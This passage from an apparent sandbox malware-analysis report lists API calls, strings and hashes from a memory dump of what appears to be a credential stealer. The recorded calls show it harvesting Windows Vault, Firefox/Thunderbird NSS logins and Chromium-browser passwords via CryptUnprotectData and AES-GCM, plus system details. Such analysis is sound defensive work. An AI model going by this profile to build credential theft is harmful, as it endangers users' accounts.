1z, xrefs: 0042A88D, 0042A8EA, 0042DE61, 0042E032, 0042E66F, 0042E6AC, 0042E750, 0042E8ED, 0042E929, 0042EA00, 0042EA4C, 0042EAF1, 0042EBA6, 0042EF75, 0042F0A9, 0042F83D
P, xrefs: 0042D5A6
8, xrefs: 0042F429
n, xrefs: 0042C0E9

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Create$Thread$H_prolog$Http$Open$Token$Process_strlen$DataDeallocateGlobalInformationMutexNameRequestUser$AllocAvailableCloseConnectConvertCurrentDefaultDuplicateErrorFileFirstFreeHandleInfoInitializeLastLocaleModuleObjectProcess32QueryReadReceiveResponseSendSingleSleepSnapshotStringToolhelp32UninitializeWait
String ID: %$&$)$+$,$.$0$2$25ef3d2ceb7c85368a843a6d0ff8291d $8$<$<$=$>$?$A$C$GET$H$H$I$I$J$K$N$O$P$POST$Q$Q$[$\$\$]$_id$`$a$g$j$m$n$ojURFai0NHYKsqWDmpwS7M4AVrTIH8Gqn8dRtUnLErUBD0tPiCUYPA== $q$qSVdAbi/K2pP5PzejMhd4MMaCbbMW8a62JwUjkSA $t$z${$|$~$1z$w$
API String ID: 2318531145-4184119060
Opcode ID: 7d423db3d9335462ce8ccc269179f6f1d752d8b3d9f8d42e4608e96e2fa89f50
Instruction ID: 7d622fafd6228d4fdc53713f6458c7401d5e653ce28518b0d51ef743c1677101
Opcode Fuzzy Hash: 7d423db3d9335462ce8ccc269179f6f1d752d8b3d9f8d42e4608e96e2fa89f50
Instruction Fuzzy Hash: B6C38F30E092A89ACB25E765CD61BEDBB759F16304F4000DEE549772C3DA781F88CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00432F9D, Relevance: 72.9, APIs: 37, Strings: 4, Instructions: 1112registryCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00432FA2

Part of subcall function 00435F3E: __EH_prolog.LIBCMT ref: 00435F43

Part of subcall function 00432961: GetEnvironmentVariableA.KERNEL32(?,?,00000104,004879A4), ref: 004329AD

Part of subcall function 004324C8: __EH_prolog.LIBCMT ref: 004324CD
Part of subcall function 004324C8: _strcat.LIBCMT ref: 00432525

RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?,00000000,0000000A,?,?,?,00000000,00489E00,0043575F,00000000,00000012,00000040), ref: 00433097
RegCloseKey.ADVAPI32(?,?,?,?,00000000,00489E00,0043575F,00000000,00000012,00000040,00000001), ref: 004330A4
RegEnumKeyExW.KERNEL32(?,00000000,?,00000800,00000000,00000000,00000000,00000000,?,?,?,00000000,00489E00,0043575F,00000000,00000012), ref: 004330D3
wsprintfW.USER32 ref: 004330FB
RegOpenKeyExW.KERNEL32(80000002,?,00000000,00020019,?,?,?,?,00489E00,0043575F,00000000,00000012,00000040,00000001), ref: 0043311A
RegQueryValueExA.KERNEL32(?,?,00000000,000F003F,?,00000800,?,?,?,00489E00,0043575F,00000000,00000012,00000040,00000001), ref: 00433195
RegQueryValueExA.KERNEL32(?,?,00000000,000F003F,?,00000800,?,?,?,?,?,00000000,?), ref: 00433334
RegCloseKey.ADVAPI32(?,?,?,?,00489E00,0043575F,00000000,00000012,00000040,00000001), ref: 00433410
RegCloseKey.ADVAPI32(?,?,?,?,00489E00,0043575F,00000000,00000012,00000040,00000001), ref: 0043342F
RegCloseKey.ADVAPI32(?,?,?,?,00489E00,0043575F,00000000,00000012,00000040,00000001), ref: 00433434
RegCloseKey.ADVAPI32(?,?,?,?,00000000,00489E00,0043575F,00000000,00000012,00000040,00000001), ref: 00433439
RegOpenKeyExW.KERNEL32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?,?,?,?,00000000,00489E00,0043575F,00000000,00000012,00000040,00000001), ref: 00433450
RegEnumKeyExW.KERNEL32(?,00000000,?,00000800,00000000,00000000,00000000,00000000,?,?,?,00000000,00489E00,0043575F,00000000,00000012), ref: 0043347E
wsprintfW.USER32 ref: 004334A6
RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00020019,?,?,?,?,00489E00,0043575F,00000000,00000012,00000040,00000001), ref: 004334C5
RegQueryValueExA.ADVAPI32(?,?,00000000,000F003F,?,00000800,?,?,?,00489E00,0043575F,00000000,00000012,00000040,00000001), ref: 00433540
RegQueryValueExA.ADVAPI32(?,?,00000000,000F003F,?,00000800,?,?,?,?,?,00000000,?), ref: 004336DF
RegCloseKey.ADVAPI32(?,?,?,?,00489E00,0043575F,00000000,00000012,00000040,00000001), ref: 004337BB
RegCloseKey.ADVAPI32(?,?,?,?,00489E00,0043575F,00000000,00000012,00000040,00000001), ref: 004337DA
RegCloseKey.ADVAPI32(?,?,?,?,00489E00,0043575F,00000000,00000012,00000040,00000001), ref: 004337DF
RegCloseKey.ADVAPI32(?,?,?,?,00000000,00489E00,0043575F,00000000,00000012,00000040,00000001), ref: 004337E4
RegOpenKeyExW.KERNEL32(80000003,0047C838,00000000,00020019,?,?,?,?,00000000,00489E00,0043575F,00000000,00000012,00000040,00000001), ref: 004337FE
RegCloseKey.ADVAPI32(?,?,?,?,00000000,00489E00,0043575F,00000000,00000012,00000040,00000001), ref: 0043380E
std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00433838
RegEnumKeyExW.KERNEL32(?,00000001,?,00000800,00000000,00000000,00000000,00000000,?,?,?,00000000,00489E00,0043575F,00000000,00000012), ref: 00433883
wsprintfW.USER32 ref: 004338AE
RegOpenKeyExW.KERNEL32(80000003,?,00000000,00020019,?,?,?,?,00489E00,0043575F,00000000,00000012,00000040,00000001), ref: 004338D0
RegEnumKeyExW.KERNEL32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00489E00,0043575F,00000000,00000012,00000040), ref: 0043390F
wsprintfW.USER32 ref: 0043393F
RegOpenKeyExW.ADVAPI32(80000003,?,00000000,00020019,?,?,?,?,?,?,?,?,?,0043575F,00000000,00000012), ref: 00433961
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,0043575F,00000000,00000012,00000040,00000001), ref: 00433971
RegQueryValueExA.ADVAPI32(?,BCE6F0E7,00000000,000F003F,?,00000800,?,?,?,?,?,?,?,?,0043575F,00000000), ref: 004339F0
RegQueryValueExA.ADVAPI32(?,C8CDDEBD,00000000,000F003F,?,00000800,?,?,?,?,?,00000000,?), ref: 00433B94
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,0043575F,00000000,00000012,00000040,00000001), ref: 00433C80
RegCloseKey.ADVAPI32(?,?,?,?,00489E00,0043575F,00000000,00000012,00000040,00000001), ref: 00433CAC
RegCloseKey.ADVAPI32(?,?,?,?,00000000,00489E00,0043575F,00000000,00000012,00000040,00000001), ref: 00433EAC

Strings

?, xrefs: 00433084
%s\%s, xrefs: 004330F5, 004334A0, 004338A8, 00433939
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0043305F, 004330EA, 00433446, 00433495, 00433896
, xrefs: 004337BD, 00433574, 004335C2, 00433689, 004337A6, 00433779, 00433606, 0043364A, 004337AC

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close$Open$QueryValue$Enumwsprintf$H_prolog$EnvironmentIos_base_dtorVariable_strcatstd::ios_base::_
String ID: %s\%s$?$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall$
API String ID: 2335028583-4013587938
Opcode ID: a4c07b4312852ec2485536da58344ab0e4616618542fccdada206c67fdb46b60
Instruction ID: 2f69684ed1a00ccbecd4360705fdc123c67f8db3404446b7b4dde3f59593aa51
Opcode Fuzzy Hash: a4c07b4312852ec2485536da58344ab0e4616618542fccdada206c67fdb46b60
Instruction Fuzzy Hash: FDA2E170D0025D9BEF21DFA4CD80BEEBBB9AF15304F2091AAE445B7242DB345B89CB55

Uniqueness

Uniqueness Score: -1.00%

Function 00427858, Relevance: 65.2, APIs: 30, Strings: 7, Instructions: 420stringlibraryloaderCOMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(?), ref: 004278A0
LoadLibraryW.KERNEL32(vaultcli.dll), ref: 004278C4
GetProcAddress.KERNEL32(00000000,?), ref: 00427911
GetProcAddress.KERNEL32(00000000,?), ref: 0042794D
GetProcAddress.KERNEL32(00000000,?), ref: 00427984
GetProcAddress.KERNEL32(00000000,?), ref: 004279BF
GetProcAddress.KERNEL32(00000000,?), ref: 004279FB
GetProcAddress.KERNEL32(00000000,?), ref: 00427A34
_memcmp.LIBVCRUNTIME ref: 00427AE4
lstrlenW.KERNEL32(?), ref: 00427AF7
lstrcpyW.KERNEL32 ref: 00427B12
lstrlenW.KERNEL32(?), ref: 00427B1F
lstrcpyW.KERNEL32 ref: 00427B3E
lstrlenW.KERNEL32(?), ref: 00427B4B
lstrcpyW.KERNEL32 ref: 00427B6F
lstrlenW.KERNEL32(?), ref: 00427BA3
lstrcpyW.KERNEL32 ref: 00427BC4
StrStrIW.SHLWAPI(?,Internet Explorer), ref: 00427CDB
lstrlenW.KERNEL32(00000000), ref: 00427CE6
lstrlenW.KERNEL32(?), ref: 00427CF6
FreeLibrary.KERNEL32(00000000), ref: 00427D84

Strings

5cT@YAsGPP, xrefs: 00427A26
Internet Explorer, xrefs: 00427CD5
8nYM, xrefs: 004279C6
vaultcli.dll, xrefs: 004278BF
LqL], xrefs: 004279D6
0, xrefs: 004279A1
U, xrefs: 004279DD

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProclstrlen$lstrcpy$Library$FreeLoadVersion_memcmp
String ID: 0$5cT@YAsGPP$8nYM$Internet Explorer$LqL]$U$vaultcli.dll
API String ID: 545859571-428589375
Opcode ID: c596c4f3b096508214223d80c22e58e128d4b4d4af656c6bf248b20ed7c47847
Instruction ID: b711c7f43c46a0bd3ce2578f65ffcc61c7ed35eefc55aa36fcb1a660e1ffc407
Opcode Fuzzy Hash: c596c4f3b096508214223d80c22e58e128d4b4d4af656c6bf248b20ed7c47847
Instruction Fuzzy Hash: 7EF16EB1D042289FEF14DFA8EC48BEEBBB8EF49304F10446AE405E7251DB789945CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0041E7C4, Relevance: 60.8, APIs: 7, Strings: 27, Instructions: 1319COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0041E7C9
SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,?,00000001,00000000), ref: 0041E7FE

Part of subcall function 004324C8: __EH_prolog.LIBCMT ref: 004324CD
Part of subcall function 004324C8: _strcat.LIBCMT ref: 00432525

Part of subcall function 0040B434: __EH_prolog.LIBCMT ref: 0040B439

Part of subcall function 004124F9: _Deallocate.LIBCONCRT ref: 0041250E

NSS_Init.NSS3(?,?,?,?,?,?), ref: 0041E960

Part of subcall function 0040B9A6: ___std_fs_copy_file@12.LIBCPMT ref: 0040B9CA

NSS_Shutdown.NSS3(?,00000001,?,00000001,?,?,?), ref: 0041FCB9

Part of subcall function 00412716: _Deallocate.LIBCONCRT ref: 00412725

sqlite3_finalize.NSS3(?), ref: 0041EFA8
sqlite3_close.NSS3(?), ref: 0041EFB5
__fread_nolock.LIBCMT ref: 0041F1BF

Part of subcall function 004247E0: __EH_prolog.LIBCMT ref: 004247E5

Part of subcall function 00422AD2: __EH_prolog.LIBCMT ref: 00422AD7

Part of subcall function 00422B5A: __EH_prolog.LIBCMT ref: 00422B5F

Part of subcall function 0041E61E: __EH_prolog.LIBCMT ref: 0041E623
Part of subcall function 0041E61E: _strlen.LIBCMT ref: 0041E690
Part of subcall function 0041E61E: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,?,00001FA0,00000000,00000000), ref: 0041E698
Part of subcall function 0041E61E: PK11_GetInternalKeySlot.NSS3(?,00000000,00000001,?,00001FA0,00000000,00000000,?,logins,logins), ref: 0041E6A6
Part of subcall function 0041E61E: PK11_FreeSlot.NSS3(?,?,00001FA0,00000000,00000000,?,logins,logins), ref: 0041E77F

Part of subcall function 00432CBF: __EH_prolog.LIBCMT ref: 00432CC4

Strings

D, xrefs: 0041EA46
logins, xrefs: 0041F239, 0041F252
%, xrefs: 0041FC35
+#, xrefs: 0041F7DD
~zgF, xrefs: 0041F77C
<`PS, xrefs: 0041F0BF
w:8-, xrefs: 0041ED14
fn, xrefs: 0041F3F5
R, xrefs: 0041F0D6
9WM, xrefs: 0041EF10
^H, xrefs: 0041F47E
>9$, xrefs: 0041ED44
Profiles, xrefs: 0041E810
$:, xrefs: 0041F9F3
A_, xrefs: 0041F786
~@fq, xrefs: 0041F770
~:#?, xrefs: 0041F000
K#$8?%*&., xrefs: 0041F51B
I!&:='($,, xrefs: 0041F2D3
[URO, xrefs: 0041F0C6
>, xrefs: 0041F00A
=nr{, xrefs: 0041FBB9
ThunderBird, xrefs: 0041F29E
m>"+, xrefs: 0041EF09
79>#, xrefs: 0041EFF4
J\, xrefs: 0041F956
19, xrefs: 0041F305

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog$DeallocateK11_Slot$BinaryCryptFolderFreeInitInternalPathShutdownString___std_fs_copy_file@12__fread_nolock_strcat_strlensqlite3_closesqlite3_finalize
String ID: $:$%$+#$19$79>#$9WM$<`PS$=nr{$>$>9$$A_$D$I!&:='($,$J\$K#$8?%*&.$Profiles$R$ThunderBird$[URO$^H$fn$logins$m>"+$w:8-$~:#?$~@fq$~zgF
API String ID: 2586454776-3097095948
Opcode ID: 0386f96a865e490c95470fc62c15cbd5f2dc7c4d0c9e4d6066e9fef3004990c9
Instruction ID: 45dd4578f040e45425f1a430fa21c4638b86fd0bd868186f894a27d3e0d6c30b
Opcode Fuzzy Hash: 0386f96a865e490c95470fc62c15cbd5f2dc7c4d0c9e4d6066e9fef3004990c9
Instruction Fuzzy Hash: 70D2A870D042A88ADB25DF68C990AEDBBB1AF59304F5441EED40973282DB785FC9CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0040DE52, Relevance: 51.8, APIs: 13, Strings: 16, Instructions: 1083libraryloaderencryptionCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040DE57
GetProcAddress.KERNEL32(?,?), ref: 0040DE9D
GetProcAddress.KERNEL32(?,?), ref: 0040DECD
GetProcAddress.KERNEL32(?,?), ref: 0040DF2B
GetProcAddress.KERNEL32(?,?), ref: 0040DF61
GetProcAddress.KERNEL32(?,?), ref: 0040DF94
GetProcAddress.KERNEL32(?,?), ref: 0040DFC7
GetProcAddress.KERNEL32(?,?), ref: 0040DFF6
GetProcAddress.KERNEL32(?,?), ref: 0040E039
wsprintfA.USER32 ref: 0040E09E

Part of subcall function 00432544: __EH_prolog.LIBCMT ref: 00432549

Part of subcall function 00412716: _Deallocate.LIBCONCRT ref: 00412725

Part of subcall function 004124F9: _Deallocate.LIBCONCRT ref: 0041250E

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040E8AA
LocalFree.KERNEL32(?,?,?), ref: 0040E912

Part of subcall function 0040C12D: __EH_prolog.LIBCMT ref: 0040C132
Part of subcall function 0040C12D: BCryptOpenAlgorithmProvider.BCRYPT(?,AES,00000000,00000000), ref: 0040C198
Part of subcall function 0040C12D: BCryptSetProperty.BCRYPT(?,ChainingMode,ChainingModeGCM,00000020,00000000), ref: 0040C1B6
Part of subcall function 0040C12D: BCryptGenerateSymmetricKey.BCRYPT(?,00000010,00000000,00000000,?,00000020,00000000), ref: 0040C1D7
Part of subcall function 0040C12D: LocalAlloc.KERNEL32(00000040,?), ref: 0040C22E
Part of subcall function 0040C12D: BCryptDecrypt.BCRYPT(00000010,?,?,?,00000000,00000000,00000000,?,?,00000000), ref: 0040C259

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040E991

Part of subcall function 004324C8: __EH_prolog.LIBCMT ref: 004324CD
Part of subcall function 004324C8: _strcat.LIBCMT ref: 00432525

Strings

Qx<, xrefs: 0040E683
360Browser, xrefs: 0040E1A4
&;*|, xrefs: 0040E00D
Opera, xrefs: 0040E564
UCBrowser, xrefs: 0040E18D
fj|, xrefs: 0040E279
O<>#, xrefs: 0040E006
#yuy, xrefs: 0040ED2F
^, xrefs: 0040EAFF
:fvU, xrefs: 0040E5CB
iN[N, xrefs: 0040E5DB
AC.m, xrefs: 0040E1CB
?y~slz, xrefs: 0040EBA0
cvcr, xrefs: 0040E6BB
v{7D, xrefs: 0040E6B2
l``d, xrefs: 0040E261

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$Crypt$H_prolog$DataDeallocateLocalUnprotect$AlgorithmAllocDecryptFreeGenerateOpenPropertyProviderSymmetric_strcatwsprintf
String ID: #yuy$&;*|$360Browser$:fvU$?y~slz$AC.m$O<>#$Opera$Qx<$UCBrowser$^$cvcr$fj|$iN[N$l``d$v{7D
API String ID: 2223174271-3787589768
Opcode ID: cb6ce26ca712e3558ad98eb963df99e7962f08f63689d0a4d261ac0c1e9d388e
Instruction ID: 31aca9d22d6dc950ebab9be51c5233e954d44f3b13592050ab9653629f8afa92
Opcode Fuzzy Hash: cb6ce26ca712e3558ad98eb963df99e7962f08f63689d0a4d261ac0c1e9d388e
Instruction Fuzzy Hash: 22A2EE30D04258CEDF21DBA5CD50BEDBBB1AF19304F1045AEE40977292DB745A88CF69

Uniqueness

Uniqueness Score: -1.00%

Function 0040EE22, Relevance: 48.1, APIs: 14, Strings: 13, Instructions: 809libraryloaderCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040EE27
GetProcAddress.KERNEL32(?,?), ref: 0040EE73
GetProcAddress.KERNEL32(?,?), ref: 0040EEA3
GetProcAddress.KERNEL32(?,?), ref: 0040EEE0
GetProcAddress.KERNEL32(?,?), ref: 0040EF16
GetProcAddress.KERNEL32(?,?), ref: 0040EF49
GetProcAddress.KERNEL32(?,?), ref: 0040EF7C
GetProcAddress.KERNEL32(?,?), ref: 0040EFAB
GetProcAddress.KERNEL32(?,?), ref: 0040EFEB
wsprintfA.USER32 ref: 0040F05F

Strings

_,.36+:l, xrefs: 0040EED3
360Browser, xrefs: 0040F19C
P>$, xrefs: 0040F905
Opera, xrefs: 0040F38F
UCBrowser, xrefs: 0040F187
,1, xrefs: 0040F236
/, xrefs: 0040EEC3
dCVC, xrefs: 0040F408
V, xrefs: 0040F960
gN, xrefs: 0040F4AF
[, xrefs: 0040F93D
(+#-, xrefs: 0040F1ED
7k{X, xrefs: 0040F3F8

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$H_prologwsprintf
String ID: (+#-$,1$/$360Browser$7k{X$Opera$P>$$UCBrowser$V$[$_,.36+:l$dCVC$gN
API String ID: 3606448584-1880947598
Opcode ID: 2a0625f2ca21b863dbce540400588b8f12dd72203c90c622731938f666bf4816
Instruction ID: e904f0a1d46169c8880a100d2e2a2770e49af191e327c0404336b77cc0987177
Opcode Fuzzy Hash: 2a0625f2ca21b863dbce540400588b8f12dd72203c90c622731938f666bf4816
Instruction Fuzzy Hash: 6B72BE30D04258DEDF25DBA4DD90AEEBBB1BF19304F1041AEE40977292DB785B88CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0041DE02, Relevance: 33.8, APIs: 15, Strings: 4, Instructions: 587libraryloaderCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0041DE07

Part of subcall function 004324C8: __EH_prolog.LIBCMT ref: 004324CD
Part of subcall function 004324C8: _strcat.LIBCMT ref: 00432525

SetCurrentDirectoryA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00000000), ref: 0041DFD2

Part of subcall function 00432961: GetEnvironmentVariableA.KERNEL32(?,?,00000104,004879A4), ref: 004329AD

Part of subcall function 0041DC5C: __EH_prolog.LIBCMT ref: 0041DC61

LoadLibraryA.KERNEL32(00000000,?,00000000,00000000), ref: 0041E2C6
GetProcAddress.KERNEL32(00000000,?), ref: 0041E312
GetProcAddress.KERNEL32(00000000,?), ref: 0041E350
GetProcAddress.KERNEL32(00000000,?), ref: 0041E38C
GetProcAddress.KERNEL32(00000000,$jww{wLQP@KSJ), ref: 0041E3CE
GetProcAddress.KERNEL32(00000000,?), ref: 0041E402
GetProcAddress.KERNEL32(00000000,?), ref: 0041E430
GetProcAddress.KERNEL32(00000000,?), ref: 0041E46E
GetProcAddress.KERNEL32(00000000,?), ref: 0041E49F
GetProcAddress.KERNEL32(00000000,?), ref: 0041E4DD
GetProcAddress.KERNEL32(00000000,?), ref: 0041E512
GetProcAddress.KERNEL32(00000000,?), ref: 0041E542
GetProcAddress.KERNEL32(00000000,0000191B), ref: 0041E58A

Strings

$jww{wLQP@KSJ, xrefs: 0041E342
=, xrefs: 0041E526
x(9,0, xrefs: 0041E1FE
O^, xrefs: 0041E3E2

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$H_prolog$CurrentDirectoryEnvironmentLibraryLoadVariable_strcat
String ID: $jww{wLQP@KSJ$=$O^$x(9,0
API String ID: 1501777685-608121719
Opcode ID: 96c8750c8e99aa9cc8bf4bad8c3a2fc38fc0f277b3430ac8a73ab89ab19b0c1a
Instruction ID: 920410ecd192129cd1fb04bf23a4e17bb3c4246b2cb495482dfcd4e0b3fe8d95
Opcode Fuzzy Hash: 96c8750c8e99aa9cc8bf4bad8c3a2fc38fc0f277b3430ac8a73ab89ab19b0c1a
Instruction Fuzzy Hash: 45322470D00298DFDF04DBAAD8543EEBBF1AF19304F50496ED841A7252DB784A85CBAD

Uniqueness

Uniqueness Score: -1.00%

Function 0040D407, Relevance: 32.2, APIs: 11, Strings: 7, Instructions: 698libraryloaderencryptionCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040D40C
GetProcAddress.KERNEL32(?,?), ref: 0040D459
GetProcAddress.KERNEL32(?,?), ref: 0040D48D
GetProcAddress.KERNEL32(?,?), ref: 0040D4CA
GetProcAddress.KERNEL32(?,?), ref: 0040D504
GetProcAddress.KERNEL32(?,?), ref: 0040D537
GetProcAddress.KERNEL32(?,?), ref: 0040D566
GetProcAddress.KERNEL32(?,?), ref: 0040D5A6

Part of subcall function 004114F1: __EH_prolog.LIBCMT ref: 004114F6

Part of subcall function 00412716: _Deallocate.LIBCONCRT ref: 00412725

wsprintfA.USER32 ref: 0040D61A

Part of subcall function 00432961: GetEnvironmentVariableA.KERNEL32(?,?,00000104,004879A4), ref: 004329AD

Part of subcall function 004324C8: __EH_prolog.LIBCMT ref: 004324CD
Part of subcall function 004324C8: _strcat.LIBCMT ref: 00432525

Part of subcall function 0040B9A6: ___std_fs_copy_file@12.LIBCPMT ref: 0040B9CA

Part of subcall function 004124F9: _Deallocate.LIBCONCRT ref: 0041250E

Part of subcall function 00432544: __EH_prolog.LIBCMT ref: 00432549

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040DC09
LocalFree.KERNEL32(?,?,?), ref: 0040DC6C

Part of subcall function 00412352: __EH_prolog.LIBCMT ref: 00412357

Part of subcall function 004130E0: __EH_prolog.LIBCMT ref: 004130E5

Strings

[, xrefs: 0040D721
9JHUPM\fZUVJ\, xrefs: 0040D599
A.", xrefs: 0040DA2F
Opera, xrefs: 0040D8FA
5 5$, xrefs: 0040DA3F
K8:', xrefs: 0040D496
"?.x, xrefs: 0040D49F

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$H_prolog$Deallocate$CryptDataEnvironmentFreeLocalUnprotectVariable___std_fs_copy_file@12_strcatwsprintf
String ID: "?.x$5 5$$9JHUPM\fZUVJ\$A."$K8:'$Opera$[
API String ID: 2073996898-1826724682
Opcode ID: 85e0fd8d25ccb005860828a94ae85f84bdb8e3a8e00fb6ad7929a3245a5bfd77
Instruction ID: 69dc042e1ea41afc1276d3b86d5bb3e38faec5f2b790624d0fcfd478f080f153
Opcode Fuzzy Hash: 85e0fd8d25ccb005860828a94ae85f84bdb8e3a8e00fb6ad7929a3245a5bfd77
Instruction Fuzzy Hash: D352BE30C042589ECF15EBA5CD51AEDBBB5BF19304F1041AEE449B7292DB781B88CF69

Uniqueness

Uniqueness Score: -1.00%

Function 0043454E, Relevance: 31.0, APIs: 13, Strings: 4, Instructions: 1202COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00434553

Part of subcall function 004340F3: __EH_prolog.LIBCMT ref: 004340F8
Part of subcall function 004340F3: RegOpenKeyExA.KERNEL32(80000002,?,00000000,00020119,?,?,?,00000004), ref: 00434196
Part of subcall function 004340F3: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,?,?,?,00000004), ref: 004341E4
Part of subcall function 004340F3: RegCloseKey.ADVAPI32(?,?,?,00000004), ref: 004341ED

_strftime.LIBCMT ref: 00434686
GetUserDefaultLCID.KERNEL32(00001001,?,00000100,?,?,?,?,?), ref: 004346AF
GetLocaleInfoA.KERNEL32(00000000), ref: 004346B6
GetUserNameA.ADVAPI32(?,?), ref: 004348F5

Part of subcall function 004131B9: __EH_prolog.LIBCMT ref: 004131BE

Part of subcall function 004357DB: GetSystemPowerStatus.KERNEL32 ref: 004357E5

GetComputerNameA.KERNEL32(?,00000101), ref: 00434FB0
GetUserNameA.ADVAPI32(00000001,00000101), ref: 00435025

Part of subcall function 004361FF: __EH_prolog.LIBCMT ref: 00436204

GetSystemInfo.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,00000000,00000012,00000040,00000001), ref: 00435347
GlobalMemoryStatusEx.KERNEL32(?,?,?,00000000,00000012,00000040,00000001), ref: 00435437
GetSystemMetrics.USER32 ref: 004355C1
GetSystemMetrics.USER32 ref: 004355EC
EnumDisplayDevicesA.USER32(00000000,00000000,?,00000000), ref: 00435678
EnumDisplayDevicesA.USER32(00000000,00000000,000001A8,00000000), ref: 004356D2

Strings

=, xrefs: 00435719
?, xrefs: 00434BC9
Sat Feb 27 21:25:06 2021, xrefs: 0043474F
@, xrefs: 0043542C

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prologSystem$NameUser$DevicesDisplayEnumInfoMetricsStatus$CloseComputerDefaultGlobalLocaleMemoryOpenPowerQueryValue_strftime
String ID: =$?$@$Sat Feb 27 21:25:06 2021
API String ID: 689499701-3079511163
Opcode ID: 1c56bdce58cc5509ef88ba6b4c456317f46a2d1ea5a33cfe17b5a9eea95a562d
Instruction ID: 24437c2b7e039daf9c73b07201adc812fe919d4c69e2b42176f1c9bf9b99e104
Opcode Fuzzy Hash: 1c56bdce58cc5509ef88ba6b4c456317f46a2d1ea5a33cfe17b5a9eea95a562d
Instruction Fuzzy Hash: 9FB2F330A042A88BDF25DF74C8507EEBB72AF59304F1495EED4496B242DB781F89CB49

Uniqueness

Uniqueness Score: -1.00%

Function 0040CD04, Relevance: 30.2, APIs: 10, Strings: 7, Instructions: 491libraryloaderencryptionCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040CD09
GetProcAddress.KERNEL32(?,?), ref: 0040CD52
GetProcAddress.KERNEL32(?,?), ref: 0040CD82
GetProcAddress.KERNEL32(?,?), ref: 0040CDBF
GetProcAddress.KERNEL32(?,?), ref: 0040CDF9
GetProcAddress.KERNEL32(?,?), ref: 0040CE2C
GetProcAddress.KERNEL32(?,?), ref: 0040CE5B
GetProcAddress.KERNEL32(?,706D6F1C), ref: 0040CE9B

Part of subcall function 004114F1: __EH_prolog.LIBCMT ref: 004114F6

Part of subcall function 00412716: _Deallocate.LIBCONCRT ref: 00412725

wsprintfA.USER32 ref: 0040CEFC

Part of subcall function 00432961: GetEnvironmentVariableA.KERNEL32(?,?,00000104,004879A4), ref: 004329AD

Part of subcall function 004324C8: __EH_prolog.LIBCMT ref: 004324CD
Part of subcall function 004324C8: _strcat.LIBCMT ref: 00432525

Part of subcall function 0040B9A6: ___std_fs_copy_file@12.LIBCPMT ref: 0040B9CA

Part of subcall function 004124F9: _Deallocate.LIBCONCRT ref: 0041250E

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040D155

Part of subcall function 00413349: __EH_prolog.LIBCMT ref: 0041334E

Strings

K8:', xrefs: 0040CE64
", xrefs: 0040D1BE
., xrefs: 0040D2CC
@GP8, xrefs: 0040D1B7
"?.x, xrefs: 0040CE6D
>{fn, xrefs: 0040D290
uhy/Cohyl, xrefs: 0040D258

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$H_prolog$Deallocate$CryptDataEnvironmentUnprotectVariable___std_fs_copy_file@12_strcatwsprintf
String ID: "$"?.x$.$>{fn$@GP8$K8:'$uhy/Cohyl
API String ID: 740930325-2360028585
Opcode ID: fade05a9c81fc25c65aafd1161fd9e18d1181cf89335b8bf6bb70fa1f0c95d79
Instruction ID: ea1f074a9a862008d5f6c35b11917e6f12f47fc94a86941be35b0d51cf07236c
